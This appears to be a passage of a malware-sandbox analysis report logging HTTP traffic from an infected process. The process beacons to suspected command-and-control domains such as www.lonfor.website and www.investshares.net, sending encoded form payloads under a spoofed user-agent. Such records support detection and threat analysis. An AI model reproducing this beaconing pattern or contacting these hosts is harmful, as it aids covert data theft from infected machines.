                                                                      Data Raw: 36 30 71 34 3d 31 7a 6a 61 54 50 7a 76 77 45 72 51 39 41 5a 70 69 4a 54 6c 7a 6a 35 63 73 55 63 62 68 6b 6f 4a 4e 6a 48 77 67 68 52 65 4f 36 75 78 41 61 4f 34 5a 65 38 62 61 52 77 67 43 56 6d 4c 65 6a 4a 61 63 2f 69 5a 2f 45 57 67 4b 50 59 70 34 6f 38 70 6e 34 43 54 69 2f 75 67 65 69 62 74 61 46 56 5a 56 48 37 6a 52 48 78 37 42 59 46 78 6e 50 35 58 4d 6a 64 48 30 67 4e 70 6d 74 6f 4c 4b 2b 63 67 73 42 65 58 47 48 42 34 31 55 79 50 4f 72 72 56 67 63 62 36 57 45 61 52 56 70 6c 72 46 4d 53 67 68 69 49 5a 7a 75 73 79 58 37 64 64 6c 52 52 55 78 2b 48 67 35 35 54 74 74 31 67 4d 77 6a 48 53 58 38 32 43 6d 51 79 73 65 55 39 55 5a 55 72 2b 43 6d 62 52 77 35 35 74 39 55 38 41 6a 51 55 50 4e 73 66 33 73 4f 4b 4c 44 35 6f 6d 73 42 35 56 67 38 30 35 6e 65 61 52 61 4d 37 77 6e 55 56 32 33 56 35 41 2f 69 4c 37 70 46 44 74 4b 38 53 6e 49 73 63 42 71 45 50 65 65 35 75 43 68 46 6a 33 57 38 33 4a 5a 71 45 2b 59 65 45 4d 37 4e 6b 76 75 6a 38 73 66 46 78 36 39 66 47 34 5a 6c 67 55 4b 52 6e 42 41 72 68 2b 5a 32 69 6a 66 [TRUNCATED]
                                                                      Data Ascii: 60q4=1zjaTPzvwErQ9AZpiJTlzj5csUcbhkoJNjHwghReO6uxAaO4Ze8baRwgCVmLejJac/iZ/EWgKPYp4o8pn4CTi/ugeibtaFVZVH7jRHx7BYFxnP5XMjdH0gNpmtoLK+cgsBeXGHB41UyPOrrVgcb6WEaRVplrFMSghiIZzusyX7ddlRRUx+Hg55Ttt1gMwjHSX82CmQyseU9UZUr+CmbRw55t9U8AjQUPNsf3sOKLD5omsB5Vg805neaRaM7wnUV23V5A/iL7pFDtK8SnIscBqEPee5uChFj3W83JZqE+YeEM7Nkvuj8sfFx69fG4ZlgUKRnBArh+Z2ijfhUh1uJJrHOAamu6egmErHHBPzHMNRIp20OEHcsqVPMLsXTasd0oaU+0uyGXmk7PUI1Qpg+D9upLg4r+LlJmj7adjWV32KoOskrg/IVIB7o4T+WKYWho2Vh7E5j6r8DLfuSdhd/xCJpvjy5zJaqV72SGT6D9iKd4XXZ2hR7cn52es5o9VKt0e7QlLYwGMSwLlV87+5xqD8g7uAF1XJgy7QLwrboq4lg8N1c36Zz7TbJokHJnQGWwxkjeA21qRBNY6QHHNfK3BENvpNa4yWy++CtCeeYb57n5VjWesZ+oF4tjVo0R3MuUYi6VLWSU58Jd2dI1uk81ZDX2+EDpZk3XprxwMfVsX2Jm+73bPH7j3r7GVQ9YIAjWGgGfVfmOJxJ8v0hd0YWYRBKtllLuJNfHKZoExIH3ZUScNTfLH8JbrZSFUMydeb1w46CbYdv6bNFceYXYdRSHOzfm18OdWQBWlv/1S/yUdHHZOuLznpDc7aYH+4u788FrNusfC27OOgPLBicKBOTy7G/F1LX8sFbFLoVURdsIpGELTmGHt+hMxf6TwlMkRvc98abLSGpU2jGzxRtxZog3vNHqLHLYT1/gDchZ62Ucdiy913KaLw49+Z/9qlQ5dkQQBCGSTeXaPVnUJsBNxosil9fmoluWnni6UoGAJITUobpUiDD [TRUNCATED]
                                                                      Jan 13, 2025 15:12:53.778836012 CET312INHTTP/1.1 404 Not Found
                                                                      Content-Length: 148
                                                                      Content-Type: text/html
                                                                      Date: Mon, 13 Jan 2025 14:12:53 GMT
                                                                      Etag: "6743f11f-94"
                                                                      Server: nginx
                                                                      Connection: close
                                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      12192.168.2.849721134.122.135.48801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:12:55.399000883 CET481OUTGET /a59t/?60q4=4xL6Q7DrxWj99jxZ5aXf1AQ9gWZB5E5jNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acut6Rdyu+TCEGVVLJHlB4H68wm+9nMwlD43slzfYSOf5Syg==&XxGx=INH0eLoh HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.44756.pizza
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 15:12:56.295811892 CET312INHTTP/1.1 404 Not Found
                                                                      Content-Length: 148
                                                                      Content-Type: text/html
                                                                      Date: Mon, 13 Jan 2025 14:12:56 GMT
                                                                      Etag: "6743f11f-94"
                                                                      Server: nginx
                                                                      Connection: close
                                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      13192.168.2.849722199.192.21.169801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:13:01.500821114 CET743OUTPOST /bowc/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.lonfor.website
                                                                      Origin: http://www.lonfor.website
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 205
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.lonfor.website/bowc/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 73 51 74 53 43 31 62 2f 4d 61 31 36 79 32 52 33 7a 4d 6c 6e 6a 59 46 6c 72 4e 75 54 7a 59 4d 4b 68 71 66 4e 4a 46 46 6b 31 4c 56 54 47 68 48 6c 55 68 56 59 35 77 31 41 51 65 59 78 38 35 57 4f 49 78 4d 4e 43 4e 64 6f 36 35 61 59 6d 52 6f 47 6a 73 44 6d 38 4d 56 30 63 63 58 43 5a 4e 4d 65 77 2f 41 58 4d 4e 53 78 42 66 67 61 74 50 34 75 50 54 59 47 7a 38 49 6e 69 4c 41 70 48 31 4d 6f 68 73 58 61 49 68 42 61 4b 4a 46 59 2f 6c 59 4f 36 4c 65 62 44 78 77 34 7a 30 6d 45 48 69 73 41 4f 35 4f 66 54 48 6a 62 57 44 64 66 61 66 7a 75 31 54 2f 6c 33 62 4c 66 74 55 68 51 65 77 37 36 59 6c 35 32 55 5a 34 3d
                                                                      Data Ascii: 60q4=sQtSC1b/Ma16y2R3zMlnjYFlrNuTzYMKhqfNJFFk1LVTGhHlUhVY5w1AQeYx85WOIxMNCNdo65aYmRoGjsDm8MV0ccXCZNMew/AXMNSxBfgatP4uPTYGz8IniLApH1MohsXaIhBaKJFY/lYO6LebDxw4z0mEHisAO5OfTHjbWDdfafzu1T/l3bLftUhQew76Yl52UZ4=
                                                                      Jan 13, 2025 15:13:02.050100088 CET918INHTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 14:13:01 GMT
                                                                      Server: Apache
                                                                      Content-Length: 774
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      14192.168.2.849723199.192.21.169801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:13:04.051412106 CET763OUTPOST /bowc/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.lonfor.website
                                                                      Origin: http://www.lonfor.website
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 225
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.lonfor.website/bowc/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 73 51 74 53 43 31 62 2f 4d 61 31 36 79 56 4a 33 79 74 6c 6e 71 59 46 6d 31 39 75 54 6d 49 4e 69 68 72 6a 4e 4a 42 31 30 70 70 78 54 48 41 33 6c 56 6c 68 59 30 51 31 41 46 75 59 77 2f 4a 57 2f 49 78 41 46 43 4d 68 6f 36 39 79 59 6d 51 59 47 69 62 2f 6c 39 63 56 79 4a 4d 58 41 58 74 4d 65 77 2f 41 58 4d 4a 44 35 42 66 34 61 74 2b 49 75 4f 78 38 4a 74 73 49 6b 6c 4c 41 70 57 6c 4d 73 68 73 58 34 49 6b 5a 67 4b 4d 42 59 2f 6e 41 4f 36 5a 32 61 4a 78 77 69 39 55 6e 6f 42 69 34 45 41 4b 61 50 58 42 72 48 49 79 4e 78 62 70 43 45 76 78 33 6a 30 62 6a 30 74 58 4a 6d 62 48 6d 53 43 47 70 47 4b 4f 73 45 77 54 6e 73 41 5a 59 38 65 4b 71 70 53 41 4a 2b 59 50 68 51
                                                                      Data Ascii: 60q4=sQtSC1b/Ma16yVJ3ytlnqYFm19uTmINihrjNJB10ppxTHA3lVlhY0Q1AFuYw/JW/IxAFCMho69yYmQYGib/l9cVyJMXAXtMew/AXMJD5Bf4at+IuOx8JtsIklLApWlMshsX4IkZgKMBY/nAO6Z2aJxwi9UnoBi4EAKaPXBrHIyNxbpCEvx3j0bj0tXJmbHmSCGpGKOsEwTnsAZY8eKqpSAJ+YPhQ
                                                                      Jan 13, 2025 15:13:04.656794071 CET918INHTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 14:13:04 GMT
                                                                      Server: Apache
                                                                      Content-Length: 774
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      15192.168.2.849724199.192.21.169801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:13:06.604235888 CET1780OUTPOST /bowc/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.lonfor.website
                                                                      Origin: http://www.lonfor.website
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1241
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.lonfor.website/bowc/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 73 51 74 53 43 31 62 2f 4d 61 31 36 79 56 4a 33 79 74 6c 6e 71 59 46 6d 31 39 75 54 6d 49 4e 69 68 72 6a 4e 4a 42 31 30 70 70 35 54 47 79 50 6c 56 43 39 59 31 51 31 41 5a 2b 59 31 2f 4a 57 69 49 31 73 42 43 4d 74 53 36 37 32 59 33 43 67 47 6c 71 2f 6c 6b 73 56 79 52 38 58 46 5a 4e 4d 78 77 2b 73 4c 4d 4e 6e 35 42 66 34 61 74 38 51 75 4e 6a 59 4a 76 73 49 6e 69 4c 41 62 48 31 4d 55 68 73 76 43 49 6b 74 77 4b 59 31 59 2f 48 51 4f 35 71 65 61 54 78 77 6b 36 55 6e 77 42 69 6c 61 41 4b 58 38 58 42 33 39 49 30 39 78 62 76 54 77 78 68 37 30 68 4b 33 77 68 47 52 34 58 47 61 58 4c 56 56 6f 47 4d 70 71 79 46 72 73 41 4b 51 64 62 4c 4f 69 49 30 55 76 52 2f 77 77 31 61 38 68 4b 4c 71 75 62 50 63 6c 4d 53 4e 6e 6c 63 34 56 41 53 6d 69 50 31 31 55 79 6d 57 54 35 33 69 66 6e 6d 61 6b 44 4c 48 44 49 41 4f 46 46 72 46 6e 67 56 6f 37 57 32 79 58 35 62 47 56 38 4a 66 75 34 4e 58 35 51 42 59 36 76 31 75 39 36 64 66 49 74 6d 6d 53 76 35 65 6e 70 79 70 71 70 76 46 62 5a 67 7a 66 67 31 77 56 47 71 4b 62 36 [TRUNCATED]
                                                                      Data Ascii: 60q4=sQtSC1b/Ma16yVJ3ytlnqYFm19uTmINihrjNJB10pp5TGyPlVC9Y1Q1AZ+Y1/JWiI1sBCMtS672Y3CgGlq/lksVyR8XFZNMxw+sLMNn5Bf4at8QuNjYJvsIniLAbH1MUhsvCIktwKY1Y/HQO5qeaTxwk6UnwBilaAKX8XB39I09xbvTwxh70hK3whGR4XGaXLVVoGMpqyFrsAKQdbLOiI0UvR/ww1a8hKLqubPclMSNnlc4VASmiP11UymWT53ifnmakDLHDIAOFFrFngVo7W2yX5bGV8Jfu4NX5QBY6v1u96dfItmmSv5enpypqpvFbZgzfg1wVGqKb6Sra2m+ZN32gee3+Y2TppFTzVlzAr+8NnWAqSvbP8fknesUU06wp2SuKmGg4LcoTgmTbFjEHM8OQTHmfOE9jFty3VAVTmJ6QtRa9pXva0a5/s18Y1JPJHZqzV4NiQEmY1uGIZ10P+cQdTIgpw2IBcSiRsErPbdOODbmS2lN+3pVdNjDycZ5rpSFlxXVAUpfuzk9egv5EX5zFu/yEidTCIwlc5/PIAjWBFzIL0CfUubqOXsa9SYAI74nLHTUZD3+Z/PmWOoCj35oc+UkCT+HDquKO8YUQynn4+Jrtw5CIEs2CUQ8AI+zVjDxv2gFNDuZUBrq1ORN33uEo98rHLrZXzK9ef8plzyBoZkH/zL4LLnA5/xV+8nJbqZTJGg9jZnVoHWoGIG5h++j6wzc4IiCtl+KYgg+EgyYkHRm+VsihOGV1QmzCx0Tyt1DvP7j9ilRB6a5MsKDmiZoKXEtgii/3vOYX3ZM0bM8w2APqzdvsBxM68zCfMyNpB8vy2P7edrP5FVXDXjtOHgJhDxMmXxUheHNXTDiBzRRNca1A13/JpR1PhVqXYAdOAeUadBHYzaS6O9lOO/4tQ7DDKkgDrchgh+lDgC9s1t8i2RlEw0VKOV34mXLdL9R5h+4eVxBOrbXgs1SauDxuKEEgREcSU1PSkRCZgcNzVCajmRj [TRUNCATED]
                                                                      Jan 13, 2025 15:13:07.261768103 CET918INHTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 14:13:07 GMT
                                                                      Server: Apache
                                                                      Content-Length: 774
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      16192.168.2.849725199.192.21.169801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:13:09.152055979 CET484OUTGET /bowc/?XxGx=INH0eLoh&60q4=hSFyBF7QNpd6wUo32OUgsrg4/MrOyIQWjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nO+9x4X9y8Z/5Ky7IaWcKrL+RZ/80JfAgkwuEz7OkyFGBk9g== HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.lonfor.website
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 15:13:09.724921942 CET933INHTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 14:13:09 GMT
                                                                      Server: Apache
                                                                      Content-Length: 774
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      17192.168.2.849726154.197.162.239801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:13:15.123614073 CET749OUTPOST /cf9p/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.investshares.net
                                                                      Origin: http://www.investshares.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 205
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.investshares.net/cf9p/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 67 6d 50 50 4f 47 54 36 70 67 71 6a 6c 48 6e 6c 4e 62 61 71 65 77 6a 78 50 63 30 4f 79 57 33 70 43 6f 68 32 4e 59 6a 70 61 65 4f 69 38 61 79 55 6f 4e 36 69 43 71 32 7a 75 6e 70 76 74 38 4c 41 44 65 74 74 48 37 73 77 65 62 78 51 62 75 55 59 46 65 2f 62 42 4a 2f 58 67 4d 44 66 64 4c 73 67 42 66 4c 32 39 43 52 30 30 77 78 79 41 39 42 7a 43 4f 42 67 57 52 71 70 54 7a 65 48 75 68 31 51 38 39 72 6b 65 59 7a 45 4a 4c 43 6c 65 42 71 69 35 38 36 68 35 6f 34 75 47 37 31 4c 52 61 4b 49 49 52 6c 63 59 56 42 59 2f 73 31 45 77 78 53 78 59 33 51 30 42 4c 4b 70 78 74 71 31 4b 65 62 65 4b 5a 43 35 42 38 45 3d
                                                                      Data Ascii: 60q4=gmPPOGT6pgqjlHnlNbaqewjxPc0OyW3pCoh2NYjpaeOi8ayUoN6iCq2zunpvt8LADettH7swebxQbuUYFe/bBJ/XgMDfdLsgBfL29CR00wxyA9BzCOBgWRqpTzeHuh1Q89rkeYzEJLCleBqi586h5o4uG71LRaKIIRlcYVBY/s1EwxSxY3Q0BLKpxtq1KebeKZC5B8E=
